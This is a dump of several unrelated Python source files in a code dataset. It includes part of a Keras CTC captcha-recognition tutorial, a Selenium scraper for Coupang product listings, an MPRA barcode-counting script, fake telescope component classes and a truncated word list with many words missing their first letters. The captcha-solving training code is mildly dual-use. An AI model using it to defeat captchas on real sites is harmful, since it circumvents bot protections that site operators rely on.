1))(x)\n\n# 記錄輸出CNN尺寸,loss部分需要這個資訊\n# conv_shape=(Batch_size,輸出高度,輸出寬度,輸出深度)\nconv_shape = x.get_shape()\nprint(conv_shape[0])\nprint(conv_shape[1])\nprint(conv_shape[2])\nprint(conv_shape[3])\n# 從(Batch_size,輸出高度,輸出寬度,輸出深度)變成(Batch_size,輸出寬度,輸出深度*輸出高度)\nx = Reshape(target_shape=(int(conv_shape[2]), int(conv_shape[1]*conv_shape[3])))(x)\nconv_shape2 = x.get_shape()\nprint(conv_shape2)\n\nx = Dense(32, activation='relu')(x)\nx = Dropout(0.25)(x)\nx = Dense(n_class, activation='softmax')(x)\n\n\n# 包裝用來預測的model\nbase_model = Model(input=input_tensor, output=x)\n\n# -------------------------------------------------------------------------------------------------------------- #\n\n# CTC Loss需要四個資訊,分別是\n# Label\n# 預測\n# CNN OUTPUT寬度\n# 預測影像所包含文字長度\n\ndef ctc_lambda_func(args):\n y_pred, labels, input_length, label_length = args\n return K.ctc_batch_cost(labels, y_pred, input_length, label_length)\n# 設定要給CTC Loss的資訊\n# n_len : 總類別\nlabels = Input(name='the_labels', shape=[n_len], dtype='float32')\ninput_length = Input(name='input_length', shape=[1], dtype='int64')\nlabel_length = Input(name='label_length', shape=[1], dtype='int64')\nloss_out = Lambda(ctc_lambda_func, output_shape=(1,), name='ctc')([x, labels, input_length, label_length])\n# 這裡的model是用來計算loss\nmodel = Model(input=[input_tensor, labels, input_length, label_length], output=[loss_out])\n# 之所以要lambda y_true, y_pred: y_pred是因為我們的loss已經包在網路裡,會output:y_true, y_pred,而我們只需要y_pred\nmodel.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer='SGD')\nmodel.summary()\n\n# 設計generator產生training data\n# 產生包含要給loss的資訊\n# X=輸入影像\n# np.ones(batch_size)*int(conv_shape[2])=CNN輸出feature Map寬度\n# np.ones(batch_size)*n_len=字串長度(可浮動)\n\ndef gen(batch_size=128):\n X = np.zeros((batch_size,height, width, 3), dtype=np.uint8)\n y = np.zeros((batch_size, n_len), dtype=np.uint8)\n while True:\n generator = ImageCaptcha(width=width, height=height)\n for i in range(batch_size):\n random_str = ''.join([random.choice(characters) for j in range(4)])\n X[i] = np.array(generator.generate_image(random_str))\n y[i] = [characters.find(x) for x in random_str]\n yield [X, y,np.ones(batch_size)*int(conv_shape[2]), np.ones(batch_size)*n_len], np.ones(batch_size)\nnext_ge=gen(batch_size=1)\ntest_ge=next(next_ge)\nplt.imshow(test_ge[0][0][0])\nprint('Label: ',test_ge[0][1])\nprint('CNN輸出寬度: ',test_ge[0][2])\nprint('字串長度(可浮動): ',test_ge[0][3])\nmodel.fit_generator(gen(32), steps_per_epoch=300, epochs=60)\n\n\n\n\n\n","sub_path":"pratice/lesson22.py","file_name":"lesson22.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"169485914","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport chromedriver_autoinstaller\nimport subprocess\nimport shutil\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom Selenium_Function.open import *\n\nclass Coupang_Shopping_Mall:\n def Coupangl(self):\n driver=open_Shopping().retrieval()\n url = \"https://www.coupang.com/\"\n driver.get(url)\n elem = WebDriverWait(driver, 1000).until(EC.presence_of_element_located((By.XPATH, \"//*[@id='searchOptionForm']/div[1]\")))\n print(\"성공\")\n prev_height = driver.execute_script(\"return document.body.scrollHeight\")\n # 반복 수행\n while True:\n # 현재 문서 높이를 가져와서 저장\n curr_height = driver.execute_script(\"return document.body.scrollHeight\")\n if curr_height == prev_height:\n break\n \n prev_height = curr_height\n \n print(\"스크롤 완료\")\n soup = BeautifulSoup(driver.page_source, \"lxml\")\n \n items = soup.find_all(\"li\", attrs={\"class\":re.compile(\"^search-product\")})\n #print(items[0].find(\"div\", attrs={\"class\":\"name\"}).get_text())\n for item in items:\n \n # 광고 제품은 제외\n ad_badge = item.find(\"span\", attrs={\"class\":\"ad-badge-text\"})\n if ad_badge:\n print(\"광고 상품 제외합니다\")\n continue\n \n name = item.find(\"div\", attrs={\"class\":\"name\"}).get_text() # 제품명\n \n \n price = item.find(\"strong\", attrs={\"class\":\"price-value\"}).get_text() # 가격\n \n # 리뷰 100개 이상, 평점 4.5 이상 되는 것만 조회\n rate = item.find(\"em\", attrs={\"class\":\"rating\"}) # 평점\n if rate:\n rate = rate.get_text()\n else:\n print(\"평점 없는 상품 제외합니다\")\n continue\n \n rate_cnt = item.find(\"span\", attrs={\"class\":\"rating-total-count\"}) # 평점 수 \n if rate_cnt:\n rate_cnt = rate_cnt.get_text() # 예 : (26)\n rate_cnt = rate_cnt[1:-1]\n #print(\"리뷰 수\", rate_cnt)\n else:\n print(\"평점 수 없는 상품 제외합니다\")\n continue\n \n print(name, price, rate, rate_cnt)","sub_path":"Shopling_product_registration/Shopping_mall/test/coupang.py","file_name":"coupang.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"253707578","text":"#!/usr/bin/python\r\n\r\n#Use multiple alignment files to get the correct alignment between the cbp mouse enhancers and human\r\n\r\nimport fileinput\r\nimport subprocess\r\nimport sys\r\nimport os\r\nfrom os import path\r\nimport glob\r\nimport re\r\nimport math;\r\nimport io;\r\nimport gzip;\r\n\r\nfrom datetime import datetime\r\n\r\n\r\n\r\n#import urllib.request\r\n#from urllib.request import urlopen\r\n#import xml.etree.ElementTree as ET\r\n#from xml.etree.ElementTree import parse\r\n\r\n#from Bio.Seq import Seq\r\n#from Bio.Alphabet import IUPAC\r\n#from Bio.Alphabet.IUPAC import unambiguous_dna, ambiguous_dna\r\n#from Bio import SeqIO\r\n#from Bio.SeqRecord import SeqRecord\r\n\r\n\r\n#perl -p -e 's/\\r//g' startingAnnot/ensembl/targetProteins.ensp.2.1.1.txt > startingAnnot/ensembl/targetProteins.ensp.2.1.2.txt\r\n\r\n#Get information from deSeq2 about significance of enhancer difference\r\n#Intersect with mouse enhancers (must be greater than 50bp to count)\r\n#Get the 0.9 quantiles over each region\r\n#Annotate the enhancer with the closest gene\r\n#Annotate the file with chromatin state\r\n#concat.allInfo.2.1.py brings everything together into one file\r\n\r\n#awk '{a[$4]++} END {print length(a)}' mergeMark.3.3.bed, print the number of unique original ids\r\n\r\n#pip3 install biopython --user\r\n\r\n################################################\r\n# Initialization #\r\n################################################\r\n\r\n#initBedStr = \"use BEDTools\";\r\n#print initBedStr\r\n#subprocess.Popen(initBedStr, shell=True).wait();\r\n\r\n#srun --partition=pfen2 --mem=8G --pty bash\r\n#module load python36\r\n#cd /home/apfennin/projects/covidTest/orthGene/\r\n\r\n\r\n################################################\r\n# Functions #\r\n################################################\r\n\r\n\r\n\r\n\r\n\r\n################################################\r\n# Version control #\r\n################################################\r\n#Version 1.1.1 - Does basic quantification of MPRA barcodes\r\n#Version 1.1.2 - Updated to loop through all fastq files\r\n#Version 2.1.1 - Update to work in parallel per file\r\n# - Read in GZ fastq\r\n\r\n\r\n################################################\r\n# PrepCode #\r\n################################################\r\n\r\n#Get a subset of the GTF file that only include CDS entries\r\n#OLd\r\n#awk -vOFS='\\t' -vFS='\\t' '{if ($3 == \"CDS\") {print $0}}' startingAnnot/GRCh38_latest_genomic.gtf > startingAnnot/GRCh38_latest_genomic_onlyCds.gtf\r\n\r\n#Copy test files to run\r\n\r\n#head /projects/MPRA/MPRA/MPRAi/MPRAi_v2_NovaSeq_Genewiz/1-3-R-11/1-3-R-11_R1_001.fastq -n 1000 > input/1-3-R-11_R1_001.test.fastq\r\n\r\n#head /projects/MPRA/MPRA/MPRAi/MPRAi_v2_NovaSeq_Genewiz/1-3-D-19/1-3-D-19_R1_001.fastq -n 1000 > input/1-3-D-19_R1_001.test.fastq\r\n\r\n#grep TCAGAACATGAGACTC /projects/MPRA/MPRA/MPRAi/MPRAi_batch1mice_1-208906698/FASTQ_Generation_2020-11-06_19_51_52Z-338176598/MPRA_Array1_sequences\r\n\r\n################################################\r\n# Command Line Run #\r\n################################################\r\n\r\n#Location\r\n#/projects/MPRA/andreas/21_06_arrayProc\r\n\r\n#module load python36\r\n#cd /projects/MPRA/andreas/21_06_arrayProc\r\n\r\n\r\n#python3 code/orthoGene_200M.2.1.1.py startingAnnot/GRCh38_latest_genomic_onlyCds.gtf startingAnnot/refSeq2Chr.04-06-20.1.txt NP_068576.1 zoonomia/zoonomiaGuide_4-6-20_2.csv /data/pfenninggroup/align/mam200/alignment_files/200m-v1.hal xSpecProtBed\r\n\r\n#python3 arrayProc.1.1.1.py input/Sample_index.txt /projects/MPRA/MPRA/MPRAi/MPRAi_v2_NovaSeq_Genewiz/ /projects/MPRA/MPRA/MPRAi/MPRAi_batch1mice_1-208906698/FASTQ_Generation_2020-11-06_19_51_52Z-338176598/MPRA_Array1_sequences\r\n\r\n#python3 arrayProc.1.1.2.py input/Sample_index.txt /projects/MPRA/MPRA/MPRAi/MPRAi_v2_NovaSeq_Genewiz/ /projects/MPRA/MPRA/MPRAi/MPRAi_batch1mice_1-208906698/FASTQ_Generation_2020-11-06_19_51_52Z-338176598/MPRA_Array1_sequences\r\n\r\n#python3 arrayProc.2.1.1.py input/ input/MPRA_Array1_sequences 105DLiver 1-3-R-11_R1_001.test.fastq countsV2/ qcV2/\r\n\r\n#python3 arrayProc.2.1.1.py /projects/MPRA/MPRA/MPRAi/MPRAi_v2_NovaSeq_Genewiz2/ input/MPRA_Array1_sequences 105DLiver 105DLiver_R1_001.fastq.gz countsV2/ qcV2/\r\n\r\n################################################\r\n# Parameters #\r\n################################################\r\n\r\n\r\n#Read in general information\r\n#indexMapFn = str(sys.argv[1]); #The file that contains index information\r\nseqDir = str(sys.argv[1]); #The directory that contains the fastqs\r\nbarcodeMapFn = str(sys.argv[2]); #The map between barcodes and enhancers\r\n\n#Read in general information\nsampName = str(sys.argv[3]); #105DLiver\nfastqFn = str(sys.argv[4]); #105DLiver_R1_001.fastq.gz\ncountsDir = str(sys.argv[5]); #countsV2\nqcDir = str(sys.argv[6]); #qcV2\n\n\n################################################\r\n# Program Control #\r\n################################################\r\n\n\n#Get genome stats\nloopDetailedB = False;\n\nloopFastB = True;\n\r\nwriteCountsB = True;\r\n\r\n\r\n################################################\r\n# Read in basic information from the annotation files #\r\n################################################\r\n\r\n######### Create a list of barcodes and their associated index ###############\r\n\r\nrcCharD = {};\r\nrcCharD['A'] = 'T';\r\nrcCharD['T'] = 'A';\r\nrcCharD['C'] = 'G';\r\nrcCharD['G'] = 'C';\r\nrcCharD['N'] = 'N';\r\n\r\ndef rcSeqFc(seq) :\r\n seq2 = \"\";\r\n for curChar in seq :\r\n seq2 = rcCharD[curChar] + seq2;\r\n #seq3 = seq2[::-1]\r\n return(seq2);\r\n\r\nbarcode2indexD = {}; #Maps barcodes to the index number\r\nbarcodeRc2indexD = {}; #Maps barcode revComp to the index number\r\n\r\ncurRow = 0;\r\ncurIndex = 0;\r\n\r\nfor curLine in fileinput.input([barcodeMapFn]):\r\n curLineP = curLine.rstrip().split(\"\\t\");\r\n if(curRow > 0 and curLineP[0] != '') :\r\n barcode2indexD[curLineP[3]] = curIndex;\r\n barcodeRc2indexD[rcSeqFc(curLineP[3])] = curIndex;\r\n curIndex = curIndex + 1;\r\n\r\n #print(rcSeqFc(curLineP[3]));\r\n\r\n\r\n curRow = curRow + 1;\r\n\r\nbarcodeArrayLen = curIndex;\r\n\r\n\r\n#print(barcode2indexD[\"GCCTATTAACTCACTA\"]);\r\n#print(\"Results - \" + str(barcodeRc2indexD[\"GAGTCTCATGTTCTGA\"]));\r\n\r\n\r\n################################################\r\n# Perform calcs for a specific fastq file #\r\n################################################\r\n#For R1, reverse complement\r\n\r\noutCountFn = countsDir + \"counts.\" + sampName + \".2.1.1.csv\";\r\noutQcFn = qcDir + \"qc.\" + sampName + \".2.1.1.csv\";\r\n\r\nfastqFnFull = seqDir + fastqFn;\r\n\r\n\r\n############### Set parameters ###########################\r\n\r\nreSiteRc1 = \"TCTAGAGGTACC\"; #Perfect match\r\nreSiteRc2 = \"TCTAGACGTACC\"; #Second match\r\nreSiteRc3 = \"TCTAGAAGTACC\"; #Third match\r\nreSiteRc4 = \"TCTAGATGTACC\"; #Fourth match\r\n\r\nreSiteV = [reSiteRc1,reSiteRc2,reSiteRc3,reSiteRc4];\r\n\r\n\r\n#primer1Rc = \"CGACGCTCTTCCGATCT\";\r\n\r\n#curExp sampName\r\n#curCountFn outCountFn\r\n#curFastQFn fastqFn\r\n\r\n############### Iterate through rows of a fastq file - Detailed #############\r\n\r\n\r\nbarcodeCountV = [0] * barcodeArrayLen;\r\n\r\nif loopDetailedB :\r\n\r\n reSiteLocV = []; #Location of restriction enzyme site matches\r\n reSiteLocLaxV = []; #Location of restriction enzyme site matches, relaxed\r\n\r\n eightyFourD = {}; #Dictionary counting sequences at position 84;\r\n\r\n bcStatusV = []; #Vector with whether a good barcode was found\r\n #-1 no RE site; 0 = no bc hit; 1=good bc hit\r\n\r\n\r\n curRow = 0;\r\n\r\n\r\n for curLine in fileinput.input([fastqFnFull]):\r\n\r\n if curRow % 4 == 1 : #Only take certain rows of the fastq\r\n #print(curLine);\r\n\r\n #Restriction Enzyme site match\r\n curResLoc = curLine.find(reSiteRc1);\r\n #print(curResLoc);\r\n reSiteLocV.append(curResLoc);\r\n\r\n #Sequences location at position 84 (looking for RE)\r\n curPos84 = curLine[84:96];\r\n #print(curPos84);\r\n if curPos84 in eightyFourD :\r\n eightyFourD[curPos84] = eightyFourD[curPos84] + 1;\r\n else :\r\n eightyFourD[curPos84] = 1;\r\n\r\n #Find RE site by looping through possibilities, prioritize best match\r\n curResLoc = -1;\r\n for curRe in reSiteV[::-1] :\r\n newPos = curLine.find(curRe);\r\n if newPos > 0 :\r\n curResLoc = newPos;\r\n reSiteLocLaxV.append(curResLoc);\r\n\r\n #Use the updated RE location to extract the barcode (revComp in sequence)\r\n if curResLoc > 0 :\r\n curBcRcSeq = curLine[(curResLoc-16):curResLoc]\r\n #print(curBcRcSeq);\r\n\r\n if curBcRcSeq in barcodeRc2indexD :\r\n #print(barcodeRc2indexD[curBcRcSeq])\r\n barcodeCountV[barcodeRc2indexD[curBcRcSeq]] = barcodeCountV[barcodeRc2indexD[curBcRcSeq]] + 1\r\n bcStatusV.append(1);\r\n else :\r\n bcStatusV.append(0);\r\n else :\r\n bcStatusV.append(-1);\r\n\r\n curRow = curRow + 1;\r\n\r\n\r\n\r\n ### Print out various stats ####\r\n reSiteLocV.sort();\r\n print(reSiteLocV);\r\n\r\n reSiteLocLaxV.sort();\r\n print(reSiteLocLaxV);\r\n\r\n numNoRe = sum(1 for item in bcStatusV if item==(-1));\r\n numNoHit = sum(1 for item in bcStatusV if item==(0));\r\n numHit = sum(1 for item in bcStatusV if item==(1));\r\n\r\n print(\"RE Found Perc = \" + str(numHit/len(bcStatusV)));\r\n\r\n #for curKey in eightyFourD :\r\n # print(curKey + \" - \" + str(eightyFourD[curKey]))\r\n\r\n #print(\",\".join(map(str,barcodeCountV)));\r\n\r\n\r\n############### Iterate through rows of a fastq file - Fast/efficient #############\r\n\r\nif loopFastB :\r\n\r\n now = datetime.now()\r\n\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n print(\"Starting Current Time =\", current_time)\r\n\r\n reSiteLocLaxV = []; #Location of restriction enzyme site matches, relaxed\r\n eightyFourD = {}; #Dictionary counting sequences at position 84;\r\n\r\n bcStatusV = []; #Vector with whether a good barcode was found\r\n #-1 no RE site; 0 = no bc hit; 1=good bc hit\r\n\r\n curRow = 0;\r\n\r\n #for curLine in fileinput.input([fastqFnFull]):\r\n with gzip.open(fastqFnFull,'rt') as f:\r\n\r\n for curLine in f:\r\n #print('got line', line)\r\n\r\n if curRow % 4 == 1 : #Only take certain rows of the fastq\r\n #print(curLine);\r\n\r\n curResLoc = -1;\r\n\r\n curPos84 = curLine[84:96];\r\n\r\n if curPos84 in reSiteV :\r\n curResLoc = 84;\r\n else :\r\n curPos83 = curLine[83:95];\r\n if curPos83 in reSiteV :\r\n curResLoc = 83;\r\n else :\r\n curPos82 = curLine[82:94];\r\n if curPos82 in reSiteV :\r\n curResLoc = 82;\r\n else :\r\n curPos85 = curLine[85:97];\r\n if curPos85 in reSiteV :\r\n curResLoc = 85;\r\n else : #Find RE site by looping through possibilities, prioritize best match\r\n for curRe in reSiteV[::-1] :\r\n newPos = curLine.find(curRe);\r\n if newPos > 0 :\r\n curResLoc = newPos;\r\n\r\n reSiteLocLaxV.append(curResLoc);\r\n\r\n #Use the updated RE location to extract the barcode (revComp in sequence)\r\n if curResLoc > 0 :\r\n curBcRcSeq = curLine[(curResLoc-16):curResLoc]\r\n #print(curBcRcSeq);\r\n\r\n if curBcRcSeq in barcodeRc2indexD :\r\n #print(barcodeRc2indexD[curBcRcSeq])\r\n barcodeCountV[barcodeRc2indexD[curBcRcSeq]] = barcodeCountV[barcodeRc2indexD[curBcRcSeq]] + 1\r\n bcStatusV.append(1);\r\n else :\r\n bcStatusV.append(0);\r\n else :\r\n bcStatusV.append(-1);\r\n\r\n curRow = curRow + 1;\r\n\r\n ### Print out various stats ####\r\n\r\n #reSiteLocLaxV.sort();\r\n #print(reSiteLocLaxV);\r\n\r\n numNoRe = sum(1 for item in bcStatusV if item==(-1));\r\n numNoHit = sum(1 for item in bcStatusV if item==(0));\r\n numHit = sum(1 for item in bcStatusV if item==(1));\r\n\r\n print(\"BC Found Perc = \" + str(numHit/len(bcStatusV)));\r\n print(\"No Hit Perc = \" + str(numNoHit/len(bcStatusV)));\r\n print(\"No RE Perc = \" + str(numNoRe/len(bcStatusV)));\r\n\r\n\r\n #for curKey in eightyFourD :\r\n # print(curKey + \" - \" + str(eightyFourD[curKey]))\r\n\r\n #print(\",\".join(map(str,barcodeCountV)));\r\n\r\n now = datetime.now()\r\n\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n print(\"Starting Current Time =\", current_time)\r\n\r\n\r\nif writeCountsB :\r\n\r\n curCountF = open(outCountFn,\"w\");\r\n curCountF.write(\",\".join(map(str,barcodeCountV)) + \"\\n\");\r\n curCountF.close();\r\n\r\n curQcF = open(outQcFn,\"w\");\r\n curQcF.write(\",\".join(map(str,[sampName,numHit,numNoHit,numNoRe])) + \"\\n\");\r\n curQcF.close();\r\n\r\n\r\nendProgram();\r\n\r\nif False :\r\n curCountF = open(\"sumStats.mpra.csv\",\"w\");\r\n for curLineV in summaryStatsM :\r\n curCountF.write(\",\".join(map(str,curLineV)) + \"\\n\");\r\n curCountF.close();\r\n\r\n################################################\r\n# Conclusions Notes #\r\n################################################\r\n\r\n#Some RE sites aren't found because they're not perfect\r\n#Almost all RE sites are in positions 82,83,84,85; most in 84\r\n #Could be used to find imperfect sites that still have barcode\r\n#Primer Site 2 is a complete mess,\r\n #often starts with TCA, not TCT, very short\r\n#Real at position 84 TCTAGAGGTACC (98)\r\n #Common alternative at 84 TCTAGACGTACC (83), TCTAGAAGTACC (11), TCTAGATGTACC (4)\r\n #Also some shifted one base\r\n#Generally 75-80% of sequences have a reverse barcode hit\r\n#Numbers are better and there is less RE wobble for hit\r\n","sub_path":"arrayProc/arrayProc.2.1.1.py","file_name":"arrayProc.2.1.1.py","file_ext":"py","file_size_in_byte":14039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"488762861","text":"\"\"\"Components for a fake telescope.\"\"\"\n\nfrom typing import List, Tuple, Dict, Any, Union, Optional\n\nfrom katpoint import Antenna, Target, rad2deg, deg2rad, wrap_angle, construct_azel_target\n\nfrom kattelmod.component import TelstateUpdatingComponent, TargetObserverMixin\nfrom kattelmod.session import CaptureState\n\n\nclass Subarray(TelstateUpdatingComponent):\n def __init__(self, config_label: str = 'unknown', band: str = 'l', product: str = 'c856M4k',\n dump_rate: float = 1.0, sub_nr: int = 1, pool_resources: str = '') -> None:\n super(Subarray, self).__init__()\n self._initialise_attributes(locals())\n\n\nclass AntennaPositioner(TargetObserverMixin, TelstateUpdatingComponent):\n def __init__(self, observer: str = '',\n real_az_min_deg: float = -185.0, real_az_max_deg: float = 275.0,\n real_el_min_deg: float = 15.0, real_el_max_deg: float = 92.0,\n max_slew_azim_dps: float = 2.0, max_slew_elev_dps: float = 1.0,\n inner_threshold_deg: float = 0.01) -> None:\n super(AntennaPositioner, self).__init__()\n self._initialise_attributes(locals())\n self.activity = 'stop'\n self.target = ''\n self.pos_actual_scan_azim = self.pos_request_scan_azim = 0.0\n self.pos_actual_scan_elev = self.pos_request_scan_elev = 90.0\n\n @property\n def target(self) -> Union[str, Target]:\n return self._target\n @target.setter # noqa: E301\n def target(self, target: Union[str, Target]) -> None:\n new_target = Target(target, antenna=self._observer) if target else ''\n if new_target != self._target and self.activity in ('scan', 'track', 'slew'):\n self.activity = 'slew' if new_target else 'stop'\n self._target = new_target\n\n def _update(self, timestamp: float) -> None:\n super(AntennaPositioner, self)._update(timestamp)\n elapsed_time = self._elapsed_time\n if self.activity in ('error', 'stop'):\n return\n az, el = self.pos_actual_scan_azim, self.pos_actual_scan_elev\n target = construct_azel_target(deg2rad(az), deg2rad(90.0)) \\\n if self.activity == 'stow' else self.target\n if not target:\n return\n requested_az, requested_el = target.azel(timestamp, self.observer)\n requested_az = rad2deg(wrap_angle(requested_az))\n requested_el = rad2deg(requested_el)\n delta_az = wrap_angle(requested_az - az, period=360.)\n delta_el = requested_el - el\n # Truncate velocities to slew rate limits and update position\n max_delta_az = self.max_slew_azim_dps * elapsed_time\n max_delta_el = self.max_slew_elev_dps * elapsed_time\n az += min(max(delta_az, -max_delta_az), max_delta_az)\n el += min(max(delta_el, -max_delta_el), max_delta_el)\n # Truncate coordinates to antenna limits\n az = min(max(az, self.real_az_min_deg), self.real_az_max_deg)\n el = min(max(el, self.real_el_min_deg), self.real_el_max_deg)\n # Check angular separation to determine lock\n dish = construct_azel_target(deg2rad(az), deg2rad(el))\n error = rad2deg(target.separation(dish, timestamp, self.observer))\n lock = error < self.inner_threshold_deg\n if lock and self.activity == 'slew':\n self.activity = 'track'\n elif not lock and self.activity == 'track':\n self.activity = 'slew'\n # Update position sensors\n self.pos_request_scan_azim = requested_az\n self.pos_request_scan_elev = requested_el\n self.pos_actual_scan_azim = az\n self.pos_actual_scan_elev = el\n # print 'elapsed: %g, max_daz: %g, max_del: %g, daz: %g, del: %g, error: %g' % \\\n # (elapsed_time, max_delta_az, max_delta_el, delta_az, delta_el, error)\n\n\nclass Environment(TelstateUpdatingComponent):\n def __init__(self) -> None:\n super(Environment, self).__init__()\n self._initialise_attributes(locals())\n self.pressure = 1020.3\n self.relative_humidity = 60.0\n self.temperature = 25.0\n self.wind_speed = 4.2\n self.wind_direction = 90.0\n\n\nclass CorrelatorBeamformer(TargetObserverMixin, TelstateUpdatingComponent):\n def __init__(self, product: str = 'c856M4k', n_chans: int = 4096, n_accs: int = 104448,\n bls_ordering: List[Tuple[str, str]] = [], bandwidth: float = 856000000.0,\n sync_time: float = 1443692800.0,\n int_time: float = 0.49978856074766354,\n scale_factor_timestamp: float = 1712000000,\n center_freq: float = 1284000000.0, observer: str = ''):\n super(CorrelatorBeamformer, self).__init__()\n self._initialise_attributes(locals())\n self.target = ''\n self.auto_delay_enabled = True\n self._add_dummy_methods('capture_start capture_stop')\n\n\nclass ScienceDataProcessor(TelstateUpdatingComponent):\n def __init__(self) -> None:\n super(ScienceDataProcessor, self).__init__()\n self._initialise_attributes(locals())\n self._add_dummy_methods('product_deconfigure capture_init capture_done')\n\n async def product_configure(self, sub: Subarray, receptors: List[Antenna],\n start_time: Optional[float] = None) -> CaptureState:\n return CaptureState.STARTED\n\n async def get_telstate(self) -> str:\n return ''\n\n\nclass Observation(TelstateUpdatingComponent):\n def __init__(self, params: Dict[str, Any] = {}):\n super(Observation, self).__init__()\n self._initialise_attributes(locals())\n self.label = ''\n self.script_log = ''\n self.activity = 'idle'\n","sub_path":"kattelmod/systems/mkat/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":5679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"25124754","text":"w = \t\t['absolute',\n\t\t\t'admonish',\n\t\t\t'advisory',\n\t\t\t'agnostic',\n\t\t\t'altruism',\n\t\t\t'asteroid',\n\t\t\t'aversion',\n\t\t\t'bachelor',\n\t\t\t'banished',\n\t\t\t'anister',\n\t\t\t'ankrupt',\n\t\t\t'aritone',\n\t\t\t'eautify',\n\t\t\t'ehavior',\n\t\t\t'irdcage',\n\t\t\t'lackout',\n\t\t\t'lockage',\n\t\t\t'ludgeon',\n\t\t\t'otulism',\n\t\t\t'oundary',\n\t\t\t'rackish',\n\t\t\t'ungalow',\n\t\t\t'utchery',\n\t\t\t'anister',\n\t\t\t'ategory',\n\t\t\t'auldron',\n\t\t\t'hildren',\n\t\t\t'hipmunk',\n\t\t\t'hlorine',\n\t\t\t'larinet',\n\t\t\t'loister',\n\t\t\t'lothier',\n\t\t\t'oliseum',\n\t\t\t'omplain',\n\t\t\t'omputer',\n\t\t\t'ourtesy',\n\t\t\t'reation',\n\t\t\t'ulinary',\n\t\t\t'ylinder',\n\t\t\t'emolish',\n\t\t\t'ialogue',\n\t\t\t'inosaur',\n\t\t\t'iscount',\n\t\t\t'octrine',\n\t\t\t'omestic',\n\t\t\t'ominate',\n\t\t\t'ynamite',\n\t\t\t'yslexia',\n\t\t\t'ducator',\n\t\t\t'migrant',\n\t\t\t'mulsify',\n\t\t\t'normity',\n\t\t\t'avorite',\n\t\t\t'erocity',\n\t\t\t'ilament',\n\t\t\t'lounder',\n\t\t\t'lourish',\n\t\t\t'raction',\n\t\t\t'ragment',\n\t\t\t'righten',\n\t\t\t'umigate',\n\t\t\t'asoline',\n\t\t\t'oldfish',\n\t\t\t'raceful',\n\t\t\t'abitude',\n\t\t\t'andgrip',\n\t\t\t'andover',\n\t\t\t'andsome',\n\t\t\t'andwork',\n\t\t\t'angbird',\n\t\t\t'angover',\n\t\t\t'ardline',\n\t\t\t'armonic',\n\t\t\t'ayfield',\n\t\t\t'azelnut',\n\t\t\t'eadlock',\n\t\t\t'eadlong',\n\t\t\t'eadwork',\n\t\t\t'edonism',\n\t\t\t'edonist',\n\t\t\t'eliport',\n\t\t\t'erdsman',\n\t\t\t'indmost',\n\t\t\t'oldfast',\n\t\t\t'omeland',\n\t\t\t'omesick',\n\t\t\t'omespun',\n\t\t\t'omeward',\n\t\t\t'ornbeam',\n\t\t\t'orsefly',\n\t\t\t'orseman',\n\t\t\t'ospital',\n\t\t\t'ostelry',\n\t\t\t'ousefly',\n\t\t\t'ouseman',\n\t\t\t'owitzer',\n\t\t\t'uckster',\n\t\t\t'umanely',\n\t\t\t'umanist',\n\t\t\t'humanity',\n\t\t\t'humanize',\n\t\t\t'humanoid',\n\t\t\t'humblest',\n\t\t\t'humbling',\n\t\t\t'humoring',\n\t\t\t'humorist',\n\t\t\t'humpback',\n\t\t\t'hungrily',\n\t\t\t'hurdling',\n\t\t\t'hurtling',\n\t\t\t'hydrogen',\n\t\t\t'hypnotic',\n\t\t\t'hysteria',\n\t\t\t'hysteric',\n\t\t\t'icebound',\n\t\t\t'ideogram',\n\t\t\t'idolater',\n\t\t\t'idolatry',\n\t\t\t'impacted',\n\t\t\t'imparted',\n\t\t\t'implored',\n\t\t\t'imported',\n\t\t\t'imposter',\n\t\t\t'improved',\n\t\t\t'impudent',\n\t\t\t'impugned',\n\t\t\t'impurely',\n\t\t\t'inchoate',\n\t\t\t'inclosed',\n\t\t\t'incubate',\n\t\t\t'incurved',\n\t\t\t'inductor',\n\t\t\t'indulger',\n\t\t\t'indurate',\n\t\t\t'industry',\n\t\t\t'inflamed',\n\t\t\t'inflated',\n\t\t\t'informal',\n\t\t\t'informed',\n\t\t\t'ingrowth',\n\t\t\t'injector',\n\t\t\t'insomuch',\n\t\t\t'insulate',\n\t\t\t'insulted',\n\t\t\t'integral',\n\t\t\t'intercom',\n\t\t\t'interval',\n\t\t\t'investor',\n\t\t\t'involute',\n\t\t\t'inwardly',\n\t\t\t'islander',\n\t\t\t'isolated',\n\t\t\t'isometry',\n\t\t\t'isopleth',\n\t\t\t'isotherm',\n\t\t\t'jalousie',\n\t\t\t'jargoned',\n\t\t\t'jaundice',\n\t\t\t'jauntier',\n\t\t\t'jauntily',\n\t\t\t'jawboned',\n\t\t\t'jealousy',\n\t\t\t'jeopardy',\n\t\t\t'jocundly',\n\t\t\t'jointure',\n\t\t\t'jokingly',\n\t\t\t'jongleur',\n\t\t\t'jostling',\n\t\t\t'jousting',\n\t\t\t'jowliest',\n\t\t\t'jubilant',\n\t\t\t'jubilate',\n\t\t\t'judgment',\n\t\t\t'jumbling',\n\t\t\t'jumpiest',\n\t\t\t'junglier',\n\t\t\t'keyboard',\n\t\t\t'keypunch',\n\t\t\t'kilobyte',\n\t\t\t'kilogram',\n\t\t\t'klystron',\n\t\t\t'knighted',\n\t\t\t'knightly',\n\t\t\t'knitwear',\n\t\t\t'knowable',\n\t\t\t'kohlrabi',\n\t\t\t'laboring',\n\t\t\t'lacewing',\n\t\t\t'laconism',\n\t\t\t'ladyship',\n\t\t\t'lambency',\n\t\t\t'lambskin',\n\t\t\t'languish',\n\t\t\t'lankiest',\n\t\t\t'lardiest',\n\t\t\t'latching',\n\t\t\t'latchkey',\n\t\t\t'laughter',\n\t\t\t'launched',\n\t\t\t'launcher',\n\t\t\t'lavished'